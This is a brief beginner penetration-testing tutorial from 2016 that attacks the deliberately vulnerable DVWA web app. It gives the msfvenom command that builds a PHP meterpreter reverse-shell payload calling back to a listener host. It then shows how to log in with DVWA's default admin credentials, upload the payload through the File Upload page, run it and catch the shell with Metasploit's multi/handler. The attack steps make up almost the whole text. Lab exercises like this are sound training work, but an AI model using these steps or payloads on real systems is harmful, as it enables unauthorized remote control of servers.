Web Server Penetration Testing with DVWA and Metasploit (Beginner Guide)

Datetime:2016-08-23 01:09:01          Topic: Penetration Testing           Share

Open your kali linux terminal and type

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.140 lport=4444 -f raw

It will generate a raw code of php file

Now copy the generated code in the text file and save it on your desktop with .php extension

Now open the DVWA Webapp in your server and login with following credentials:

Username– admin

Password– password

Now scroll to the File Upload section in left pane and upload the above created php file

When you will finish uploading your php file, it will show you the path

Now open your uploaded file in browser

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.0.140

set lport 4444

exploit

Now you can access the victim’s server





About List